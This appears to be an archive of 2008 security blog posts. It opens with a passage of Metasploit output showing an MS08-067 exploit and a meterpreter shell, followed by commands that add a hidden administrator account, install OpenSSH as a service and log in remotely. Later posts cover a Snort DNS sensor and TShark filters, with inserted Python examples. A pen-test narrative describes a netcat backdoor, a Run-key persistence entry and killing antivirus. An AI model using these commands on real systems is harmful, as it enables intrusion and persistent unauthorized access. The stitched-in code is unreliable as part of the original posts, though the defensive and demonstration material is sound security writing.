lots of output truncated ....<br /><br />meterpreter > execute -f cmd.exe -i<br />Process 848 created.<br />Channel 66 created.<br /><br /><br /><br /><span style="font-weight: bold;">Modifying the Registry and Adding Your Own Username</span><br /><br />Here, we import all of our registry keys, then add our own username, making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes, and register the service.<br /><br /><br />Microsoft Windows [Version 5.2.3790]<br />(C) Copyright 1985-2003 Microsoft Corp.<br />C:\Program Files\openssh>whoami<br />whoami<br />nt authority\system<br /><br />C:\Program Files\openssh>reg import openssh.reg<br />reg import openssh.reg<br />The operation completed successfully.<br /><br />C:\Program Files\openssh>net user inet_p0wned gameover /add<br />net user inet_p0wned gameover /add<br />The command completed successfully.<br /><br /><br />C:\Program Files\openssh>net localgroup administrators inet_p0wned /add<br />net localgroup administrators inet_p0wned /add<br />The command completed successfully.<br /><br /><br />C:\Program Files\openssh>cd etc<br />cd etc<br /><br />C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd<br />..\bin\mkpasswd -l >passwd<br />C:\Program Files\openssh\etc>..\bin\mkgroup -l >group<br />..\bin\mkgroup -l >group<br /><br />C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto<br />sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto<br />[SC] CreateService SUCCESS<br /><br /><br /><br /><span style="font-weight: bold;">Start the OpenSSH Service</span><br /><br />C:\Program Files\openssh\etc>sc start opensshd<br />sc start opensshd<br />SERVICE_NAME: opensshd<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> STATE : 2 START_PENDING<br /> (NOT_STOPPABLE, NOT_PAUSABLE,<br />IGNORES_SHUTDOWN))<br /> WIN32_EXIT_CODE : 0 (0x0)<br /> SERVICE_EXIT_CODE : 0 (0x0)<br /> 
CHECKPOINT : 0x0<br /> WAIT_HINT : 0x7d0<br /> PID : 1916<br /> FLAGS :<br /><br />C:\Program Files\openssh\etc>sc query opensshd<br />sc query opensshd<br />SERVICE_NAME: opensshd<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> STATE : 4 RUNNING<br /> (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))<br /> WIN32_EXIT_CODE : 0 (0x0)<br /> SERVICE_EXIT_CODE : 0 (0x0)<br /> CHECKPOINT : 0x0<br /> WAIT_HINT : 0x0<br /><br />C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24<br /><br />The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**<br /><br />**Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the "command not found" error message shown above. It is a good idea to restrict the source networks so that you don't leave a gaping opportunity open while testing.<br /><br />C:\Program Files\openssh\etc>exit<br />exit<br />meterpreter > quit<br /><br />[*] Meterpreter session 1 closed.<br />msf exploit(ms08_067_netapi) > quit<br /><br /><br /><br /><br /><br /><span style="font-weight: bold;">Now, let's go ahead and SSH into our Windows server to check if things worked!</span><br /><br /><br />root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40<br />The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.<br />RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.<br />Are you sure you want to continue connecting (yes/no)? yes<br />Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.<br /><br />OpenSSH for Windows. 
Welcome aboard!<br /><br />inet_p0wned@192.168.1.40's password:<br />Could not chdir to home directory /home/inet_p0wned: No such file or directory<br />Microsoft Windows [Version 5.2.3790]<br />(C) Copyright 1985-2003 Microsoft Corp.<br />C:\Program Files\OpenSSH><br />C:\Program Files\OpenSSH>whoami<br />system-hj28hhgl7n\inet_p0wned<br /><br />C:\Program Files\OpenSSH>exit<br />Connection to 192.168.1.40 closed.<br />[root@localhost framework-3.2]#<br /><br /><br /><span style="font-weight: bold;">Cleaning up</span><br /><br />To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it. Note that the directory to remove is the openssh directory created under Program Files above; opensshd is only the service name.<br /><br />C:\> SC STOP opensshd<br />C:\> SC DELETE opensshd<br />C:\> REG DELETE "HKLM\SOFTWARE\Cygnus Solutions" /f /va<br />C:\> REG DELETE "HKLM\SYSTEM\ControlSet001\Services\OpenSSHd" /f /va<br />C:\> REG DELETE "HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd" /f /va<br /><br />C:\> CD "\Program Files"<br />C:\Program Files> RMDIR /Q /S openssh<br />C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22<br />C:\Program Files> NET USER inet_p0wned /DELETE<br /><br /><br /><span style="font-weight: bold;">Focused IDS Sensor for DNS</span> (2008-11-02)<br /><br />Many enterprises have what is known as a split domain name system (DNS) configuration. Split DNS is where you serve your internal network from one DNS server (or perhaps a pair), but forward all unresolved requests to other DNS servers that live within your DMZ. Using split DNS provides some security protection for your internal DNS servers, and a performance benefit in that the internal servers do not have to cache external network information. 
<br /><br />Additional security protection can be provided by carefully controlling your network perimeter (anti-spoofing and bogon filtering, for example), and by carefully configuring your external DNS servers to only respond to DNS requests that are within your network domain.<br /><br />In recent times, DNS cache poisoning has risen as a significant challenge yet again. It has been noted that DNS is fundamentally flawed due to its weak reliance on matching the DNS identification field and packet source information in query responses. Though widespread deployment of DNSSEC is the correct solution, it has not yet gained enough popularity.<br /><br />Beyond ensuring that you have the correct vendor patches, which are written to ensure significant entropy in the randomly chosen DNS identification field and UDP source ports, there needs to be another method to indicate that your DNS cache may be poisoned. <br /><br />The two methods I find effective are to use the CAIDA project's DNS statistics collector (DSC), and to also deploy a focused Intrusion Detection Sensor (IDS) with Snort running directly on my DNS servers.<br /><br />First of all, I would recommend becoming a registered snort user at <a href="http://www.snort.org/">www.snort.org</a> in order to stay within about one month of the current snort signature releases. Then, assuming you are running a UNIX based system for your DNS server(s), download the latest snort source code, which as of this writing is <a href="http://www.snort.org/dl/snort-2.8.3.1.tar.gz">snort-2.8.3.1.tar.gz</a>.<br /><br /><ol><li>Compile and install snort.</li><li>After installation, you should have a /etc/snort directory which contains a basic snort configuration file and the base set of rules.</li><li>Download the latest registered user rule set from snort.org and extract it inside the /etc/snort directory.</li><li>Now, start editing the /etc/snort/snort.conf file with your favorite text editor. 
In some installations, this file might be located in /etc/snort/rules.</li></ol><br />Key variables you must set in order to get snort functioning are as follows, with example values:<br /><ul><li>HOME_NET = $eth0_ADDRESS</li><li>EXTERNAL_NET = !$HOME_NET</li><li>DNS_SERVERS = [172.16.1.1, 172.16.2.1]</li></ul>Since this is a focused sensor, I would suggest that the home network (HOME_NET) be set to the address of the DNS server itself. The external network variable can simply be anything that is not the home network.<br /><br />With regard to snort's preprocessors, you will need to keep <span style="font-weight: bold;">frag3</span> and <span style="font-weight: bold;">stream5</span> for fragmentation and stream reassembly respectively. Most importantly, the only remaining preprocessor you must have configured is the DNS preprocessor.<br /><br />To keep the sensor memory usage low, I would disable (by commenting out) all other preprocessors, such as ftp_telnet, http, dcerpc etc. You are deploying a sensor focused on DNS, so let's keep it optimized and looking at DNS traffic!<br /><br />Next, go down to where the <span style="font-weight: bold;">include</span> statements reside, and comment out ALL of the includes listed except the one that reads: <span style="font-weight: bold;">include $RULE_PATH/dns.rules</span><br /><br />Now, test your configuration:<br /><br /><span style="font-weight: bold;">snort -p -c /etc/snort/snort.conf -A cmg -u_snort -g_snort -t/var/snort -l/var/snort/log<br /><br /></span>You should watch the output and make sure that there are no errors. Also, please note that the above command line uses the <span style="font-weight: bold;">-p</span> flag to disable promiscuous mode on your DNS server interface card. 
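The canary this sensor is meant to provide, reduced to its core check, as an added example in Python (not code from the original post and not part of Snort or its DNS preprocessor): parse the DNS header of response datagrams and raise an alert when one resolver address returns a burst of NXDOMAIN (RCODE 3) replies inside a sliding time window. The datagrams are constructed inline, so it runs offline; the window length, the threshold and the use of the resolver address 172.16.1.1 from the DNS_SERVERS example are assumptions made for the demonstration.

```python
import struct
from collections import defaultdict, deque

NXDOMAIN = 3           # DNS RCODE 3, "name error" (RFC 1035)
WINDOW_SECONDS = 10.0  # sliding window length (assumed value for this demo)
THRESHOLD = 20         # NXDOMAIN replies per window before alerting (assumed)


def build_dns_response(txid, rcode, qname="example.invalid"):
    """Construct a minimal DNS response (header + question, no answer records).

    Constructed test data only; flags set QR=1 (response), RD=1, RA=1 and RCODE.
    """
    flags = 0x8000 | 0x0100 | 0x0080 | (rcode & 0x000F)
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    question = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                        for lbl in qname.split("."))
    question += b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE A, QCLASS IN
    return header + question


def parse_dns_header(payload):
    """Return (txid, is_response, rcode) from the 12-byte DNS header."""
    if len(payload) < 12:
        raise ValueError("truncated DNS header")
    txid, flags = struct.unpack("!HH", payload[:4])
    return txid, bool(flags & 0x8000), flags & 0x000F


class NxdomainMonitor:
    """Count NXDOMAIN responses per resolver address over a sliding time window."""

    def __init__(self, window=WINDOW_SECONDS, threshold=THRESHOLD):
        self.window = window
        self.threshold = threshold
        self.seen = defaultdict(deque)   # resolver address -> timestamps of NXDOMAINs

    def observe(self, ts, resolver, payload):
        """Feed one UDP/53 datagram sent by `resolver`; return an alert string or None."""
        _, is_response, rcode = parse_dns_header(payload)
        if not is_response or rcode != NXDOMAIN:
            return None
        stamps = self.seen[resolver]
        stamps.append(ts)
        while stamps and ts - stamps[0] > self.window:   # drop events outside the window
            stamps.popleft()
        if len(stamps) >= self.threshold:
            return (f"ALERT: {len(stamps)} NXDOMAIN replies from {resolver} "
                    f"within {self.window:g}s (possible cache poisoning attempt)")
        return None


def simulate_constructed_traffic():
    """Run the monitor over constructed datagrams and return the alerts it raised."""
    monitor = NxdomainMonitor()
    resolver = "172.16.1.1"      # resolver address taken from the DNS_SERVERS example above
    alerts = []
    # Background: a handful of NOERROR answers spread over five seconds.
    for i in range(5):
        alerts.append(monitor.observe(float(i), resolver, build_dns_response(1000 + i, 0)))
    # Burst: 25 NXDOMAIN answers inside 2.5 seconds, the pattern the sensor should squawk about.
    for i in range(25):
        alerts.append(monitor.observe(10.0 + 0.1 * i, resolver,
                                      build_dns_response(2000 + i, NXDOMAIN)))
    return [a for a in alerts if a is not None]


if __name__ == "__main__":
    for line in simulate_constructed_traffic():
        print(line)
```

On a real sensor the timestamps and resolver address would come from the captured UDP/53 packets rather than from the loop above; the threshold is deliberately per source, since a burst from one resolver stands out while the same number of NXDOMAINs spread over many clients is usually just a misbehaving application of the kind the post mentions below.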
Again, let's remember that this is a focused sensor that is looking at the traffic going to/from this specific DNS system, so your network card does NOT need to see other systems' traffic.<br /><br />Also, to be as secure as possible, always run as a non-root user, hence the use of <span style="font-weight: bold;">-u_snort</span> and <span style="font-weight: bold;">-g_snort</span> to change the effective running user and group id respectively.<br /><br />Once you have checked that your configuration is operating as expected, set up snort to run at boot time, and start the process as follows:<br /><br /><span style="font-weight: bold;">snort -pD -c/etc/snort/snort.conf -u_snort -g_snort -t/var/snort -l/var/snort/log</span><br /><br />I would additionally suggest adding <span style="font-weight: bold;">output alert_syslog</span> to your configuration. If things are set up properly, the false positive (noise) level should be very low, so I personally syslog ALL alerts to the console of the UNIX system itself as well as to the root user, to make sure that if any IDS alerts show up, I will see them.<br /><br />Following all these steps now gives you the equivalent of the canary in the coal mine. Your snort sensor is optimally configured to start squawking if there are events such as a large number of DNS NXDOMAIN replies indicating potential cache poisoning.<br /><br />The additional bonus is that you will quickly find applications on your network that are misbehaving and incorrectly beating on your DNS infrastructure when they should not be!<br /><br />Happy hunting.<br /><br /><br /><span style="font-weight: bold;">TShark - High performance packet capture</span> (2008-10-25)<br /><br />Wireshark users may not realize that there is a command line version of Wireshark, namely TShark, which provides superior packet capture performance. 
The challenge with Wireshark is that it has to update all of the window elements while at the same time capturing data, and its defaults do not favor performance.<br /><br />When you are in a situation of very high traffic flow (like a DoS attack perhaps), you really need to capture as much of the data as possible to a file for later "post analysis". I always use a combination of setting up the TShark capture with a Berkeley Packet Filter (BPF), and then plugging the RJ-45 Ethernet cable in after the capture is set to run.<br /><br />To run TShark within MS-Windows, you need to start a command window first.<br /><br /><span style="font-weight: bold;">Start -> Run -> CMD.EXE</span><br /><br />Find the directory that TShark is installed within. For a default Wireshark installation, it is probably as follows:<br /><br /><span style="font-weight: bold;">CD \Program Files\Wireshark</span><br /><br />Then, find out the HELP syntax from TShark:<br /><br /><span style="font-weight: bold;">tshark -h</span><br /><br />The first thing you must do is find out which network interface number you must use for the data capture.<br /><br />tshark -D shows all of the interfaces with an integer number in front of them. Windows identifies each network interface by a long hexadecimal object identifier, but you really don't want to have to remember that!<br /><br />example output:<br /><br />1. \Device\NPF_{11A468B6-C065-45F6-AB32-D69695A6F601} (MS Tunnel Interface Driver)<br />2. \Device\NPF_{A16900A3-020C-4B05-B430-4CD67527C189} (Realtek RTL8168B/8111B PCI-E Gigabit Ethernet NIC)<br /><br /><br />Now, select the right interface, capture some data and write it directly to a file. For example:<br /><br /><span style="font-weight: bold;">tshark -i 2 -s 200 -w example.pcap -f "tcp[13] = 0x14"</span><br /><br />The particular example shown above captures packets where the byte at offset 13 of the TCP header (the flags byte) equals hexadecimal 0x14. 
This happens to be packets that have the TCP flags of RST and ACK set. The -i flag is used to select the capture interface.<br /><br />TShark will count the packets captured, and then you simply use the CTRL-C keyboard sequence to stop the capture when finished. After that, open your example.pcap file within Wireshark for full analysis. The (.pcap) file extension ensures you could simply double click the file itself.<br /><br />With regard to the -s (snap length) flag, be aware that TShark will default to a packet capture length of 65,535 bytes, which given a standard 1514 MTU Ethernet frame size, will always capture the entire packet. Using a snaplen of 68 bytes makes the behavior of TShark identical to tcpdump default behavior.<br /><br />Early versions of TShark did not allow a snaplen that is less than 68 bytes, however I believe there is a source patch that has fixed this now for those who like capturing headers only! Some quick calculations:<br /><br /><ul><li> Ethernet header = 14 bytes</li><li> IPv4 header (without options) = 20 bytes</li><li> TCP header (without options) = 20 bytes</li><li> Typical TCP header options for Windows Vista = 12 bytes</li><li> UDP header = 8 bytes</li></ul><br />If we examine a TCP SYN packet of a modern operating system, there are almost always TCP options attached. Windows Vista by default will use Max Segment Size (0x02), Window Scaling (0x03), and Selective Acknowledgement (0x04), as well as three No Operation (NOP = 0x01) options, giving a total of 12 bytes on a TCP SYN packet. The NOP option is used to pad the options data to even byte boundaries so that 32-bit processor code is happy!<br /><br />To capture a Windows Vista TCP SYN packet header under IPv4 with all options, we would need a minimal snap length as follows:<br /><br />14 (Ethernet header) + 20 (IP header) + 20 (TCP header) + 12 (TCP options) = 66 bytes.<br /><br />If you want to throw in some payload data, then add more to the snap length from there. 
I find that a snap length of about 200 gives good performance and captures a reasonable amount of data.<br /><br />Keep your goals in mind! If you were capturing traffic that is a Samba CIFS file read for example, you can be pretty sure that the server to client TCP packets will have 1514 bytes of data, so use the default snaplen!<br /><br />With regard to the Berkeley Packet Filters (libpcap / BPF), the standard language syntax applies. So, if ever in need of help, you can always get on a UN*X host somewhere and do 'man tcpdump' and learn all about the BPF syntax used within libpcap.<br /><br />Some ideas as follows:<br /><br /><span style="font-weight: bold;">-f "src host 1.2.3.4 and dst host 5.4.3.2"</span><br /><span style="font-weight: bold;">-f "dst port 22"</span><br /><span style="font-weight: bold;">-f "dst port 80"</span><br /><br />The last example below shows some interesting ways to use the BPF syntax in combination with binary masking for very specific filter matches. We take the 13th byte of the TCP header, shift it left by a nibble (4 bits), mask it with 0x40 (binary 0100 0000), and finally test it not equal to zero. In short, this will show any packet with the TCP RST flag set, but not exclusively that flag (i.e. we could see purely the RST flag, or packets with RST+ACK, or some other illegal combination).<br /><br /><span style="font-weight: bold;">-f "(tcp[13] << 4 & 0x40) != 0"</span><br /><br />BPF syntax allows us to either use macros for matching (like: src port), or header field matches with integer offsets for the more sophisticated.<br /><br />Next time you need to capture traffic that is saturating some network link, give TShark some consideration to ensure a high degree of performance and better accuracy. <br /><br />Finally, for maximum network and security analyst safety, please always ensure you have the latest version of Wireshark and WinPCAP. 
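The snap-length arithmetic and the two tcp[13] filters above, checked against Ethernet/IPv4/TCP frames that are constructed inline rather than captured, as an added example in Python (not code from the original post, TShark or libpcap). The helper names (min_snaplen, build_tcp_frame, headers_intact and the match functions) are hypothetical and written for this demonstration; the 12-byte option set mirrors the Vista SYN options listed above. It goes slightly beyond the text by also checking that a snaplen one byte short of 66 loses part of the options, and by reading the IPv4 header length so that IP options cannot shift the flags byte.

```python
import struct

ETH_HDR, IPV4_HDR, TCP_HDR, UDP_HDR = 14, 20, 20, 8

# TCP flag bits carried in the byte at TCP offset 13 (tcp[13] in BPF)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# The 12 bytes of options a Vista SYN carries, as listed above: MSS, NOP,
# window scale, NOP, NOP, SACK-permitted (constructed values).
VISTA_SYN_OPTIONS = (b"\x02\x04\x05\xb4"    # MSS = 1460
                     b"\x01"                # NOP
                     b"\x03\x03\x08"        # window scale = 8
                     b"\x01\x01"            # NOP, NOP
                     b"\x04\x02")           # SACK permitted


def min_snaplen(transport="tcp", ip_options=0, tcp_options=0):
    """Smallest snaplen that keeps Ethernet + IPv4 + transport header (with options) whole."""
    if transport == "tcp":
        return ETH_HDR + IPV4_HDR + ip_options + TCP_HDR + tcp_options
    return ETH_HDR + IPV4_HDR + ip_options + UDP_HDR


def build_tcp_frame(flags, tcp_options=b"", payload=b""):
    """Construct an Ethernet/IPv4/TCP frame with the given flag byte (checksums left zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"                        # MACs, EtherType IPv4
    tcp_len = TCP_HDR + len(tcp_options)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IPV4_HDR + tcp_len + len(payload),
                     0, 0x4000, 64, 6, 0, bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    data_offset = (tcp_len // 4) << 4                       # header length in 32-bit words
    tcp = struct.pack("!HHIIBBHHH", 1234, 80, 0, 0, data_offset, flags, 8192, 0, 0)
    return eth + ip + tcp + tcp_options + payload


def tcp_flag_byte(frame):
    """Read tcp[13], honouring the IPv4 header length so IP options do not shift it."""
    ihl = (frame[ETH_HDR] & 0x0F) * 4
    idx = ETH_HDR + ihl + 13
    if idx >= len(frame):
        raise ValueError("frame truncated before tcp[13]")
    return frame[idx]


def matches_rst_ack(frame):
    """BPF 'tcp[13] = 0x14': exactly RST+ACK and nothing else set."""
    return tcp_flag_byte(frame) == 0x14


def matches_any_rst(frame):
    """BPF '(tcp[13] << 4 & 0x40) != 0': RST set, whatever else is set."""
    return ((tcp_flag_byte(frame) << 4) & 0x40) != 0


def headers_intact(frame, snaplen):
    """True if the first `snaplen` bytes still hold the full Ethernet/IPv4/TCP headers and options."""
    cut = frame[:snaplen]
    if len(cut) <= ETH_HDR:
        return False
    ihl = (cut[ETH_HDR] & 0x0F) * 4
    off = ETH_HDR + ihl + 12                               # TCP data-offset byte
    if off >= len(cut):
        return False
    tcp_hdr_len = (cut[off] >> 4) * 4
    return len(cut) >= ETH_HDR + ihl + tcp_hdr_len


if __name__ == "__main__":
    syn = build_tcp_frame(SYN, VISTA_SYN_OPTIONS)
    print("Vista SYN needs snaplen", min_snaplen(tcp_options=len(VISTA_SYN_OPTIONS)))
    print("66 bytes keeps options:", headers_intact(syn, 66), "; 65 bytes:", headers_intact(syn, 65))
    rst = build_tcp_frame(RST)
    print("RST only: tcp[13]=0x14 ->", matches_rst_ack(rst), "; any-RST ->", matches_any_rst(rst))
```

The shift-and-mask form is worth keeping in mind when reading captures: since RST is bit 0x04, shifting left by four moves it to 0x40, which is why the mask picks out RST alone regardless of ACK or any other flag, whereas the equality test only matches the exact RST+ACK combination.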
There have been published exploits against these open source products and you don't want to be a victim!<br /><br /><br /><span style="font-weight: bold;">Selling security via ethical hacking</span> (2008-10-24)<br /><br />I had the pleasure recently in my organization to receive a directive similar to this. "Please develop a presentation that shows people why they need to be a participant in our new higher security network service".<br /><br />Ok, calling to all you creative geeks out there - wow... did I just get an order to "ethically hack"? My thinking was "yes" and this turned out to be one of the most fun assignments I had come across in a while.<br /><br />My first response was to get my "get out of jail free" card signed. (kudos to our friend Ed Skoudis for this one: <a href="http://www.counterhack.net/permission_memo.html">http://www.counterhack.net/permission_memo.html</a>)<br /><br />I then went away for 2 weeks to develop a quick and scary hacking demo that I could present in 45 minutes as a pure sales job for higher security. The structure of the demo ended up being a combination of some powerpoint slides, and some real live Metasploit fun.<br /><br />The powerpoint slides went as follows.<br /><ul><li>Describe the process of penetrating an enterprise network (scanning, recon, gaining access, keeping access, covering tracks). My colleague did a little google hacking show in the process.</li><li>Describe the C programming language and its flaws, paying special attention to how sub-routines in "C" are being exploited due to poor programming practices with respect to unbounded arrays.</li><li>Describe how sub-routines in "C" are embedded in just about all of the computing devices in use today</li><li>Show a Metasploit Demo!</li></ul><br />So, without further ado, let's talk about the Metasploit demo. 
First of all, I have to admit upfront that this was a time limited (canned) demo and I decided, in the interests of keeping my job, not to find targets on our live network. (Although I may have done so if I had obtained enough advance recon. time)<br /><br />Here is what I did:<br /><ol><li>Set up a laptop with two virtual machines on it. One of the two had an unpatched WinXP host with no service packs, the second of the two was WinXP with service pack 2.</li><br /><li>Using a second MacBook, I scripted two flavors of MetaSploit attacks. I called them "direct network attacks", and "indirect network attacks". The exploits used for either flavor were basically the same, it simply depended on whether I attacked the target directly over a local network (back to back cable) or had the target come to my local web service.</li><br /><li>Direct network attack exploits used were as follows:</li><br /><ul><li>MS03-026: RPC-DCOM buffer overflow</li><li>MS03-049: Workstation Service NetAPI buffer overflow</li><li>MS04-007: Abstract Syntax Notation Library (ASN.1) buffer overflow</li><li>MS04-011: LSASS buffer overflow</li></ul><br /><li>Indirect (phishing style) exploits used were as follows:</li><br /><ul><li>MS07-?: Browser LoadAniIcon() in User32.dll</li><li>MS07/08-?: Browser generic activex overflow</li><li>MS06-001: GDI Library WMF SetAbortProc() </li></ul><br /><li>Payloads used were either the VNC DLL injection, Shellcode, or Meterpreter</li><br /><li>Finally, both laptops were at the front of the room with two projectors showing each screen. Sort of a "bad guy" and "innocent victim" approach.</li></ol>Starting with the unpatched WinXP machine, I did the most simple RPC DCOM buffer overflow, and pushed the reverse VNC DLL payload onto the target. 
On the MacBook, I then simply connected to the VNC server on the localhost address and displayed a mirror image of the screen.<br /><br />I had a fake looking file called "WIDGET-SALES.TXT" on the desktop which I displayed on the screen to show that the goal was all about gaining access to data (not necessarily about gaining root/system).<br /><br />I then moved onto the second virtual machine to show a typical phishing attempt. My colleague and I faked up a google mail page with a URL link in it as the browser home page. On the MacBook, I launched my MetaSploit web listener with the LoadAniIcon() sploit as the payload, and MeterPreter as the payload.<br /><br />On the WinXP-SP2 virtual, I showed the user clicking on the "phishing URL" within the google email page (from IE). The buffer overflow transpired, and we launched Meterpreter.<br /><br />Using a meterpreter script, I did the following:<br /><ul><li>created a hidden directory</li><li>uploaded netcat.exe</li><li>poked a hole in the Windows firewall on port 8888 with a service name of "msc".</li><li>tweaked the "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" registry key to start my backdoor netcat listener on port 8888.</li></ul>While still using Meterpreter, I killed a few processes (like Symantec AV), executed notepad, calculator, solitaire to truly show the level of control I had over the victim.<br /><br />I then simply booted the machine from Meterpreter. After the reboot, I showed how I could use netcat from the MacBook to reconnect to the target multiple times, gaining Windows shell access each time.<br /><br />All of this was accomplished in 45 minutes and let me tell you, I scared the wits out of everyone in the room. 
The weirdest part for me was that <span style="font-weight: bold; font-style: italic;">remotely rebooting the victim machine from Meterpreter seemed to have the highest impact.</span> (<span style="font-style: italic;">*sigh*</span> - sometimes you just have to take what you can get....)<br /><br />However, the bottom line was outrageous success. In one short session, we built demand for more institutional network security implementation than we ever had experienced before. It actually turned into a case of "be careful what you wish for".<br /><br /><br /><span style="font-weight: bold;">Multicast as a recon. or attack vector?</span> (2008-10-24)<br /><br />Having been in the network architecture and security business for some time, I am quite surprised that more network recon and attack tools have not given consideration to Multicast destinations. The backdrop is that more and more internal networks are video [multicast] enabled, and academic Internet2 participants are often Multicast enabled in a Wide Area (WAN) sense.<br /><br />Assuming minimally some internal network access, it would seem that a quick method of recon would be to send traffic to a well known multicast application address / port, and see what it yields. At worst, you find a network that is not Multicast enabled and responds at layer 2 only.<br /><br />More insidious would be the existence of backdoor command and control of botnets listening on Multicast addresses. One would only need access to a single internal network node in a large enterprise to send command and control to the remainder of the herd. Or worse still, if that botnet lived within the Internet2 wide area Multicast space, the command and control aspect could easily be just a trickle of Multicast and not noticed.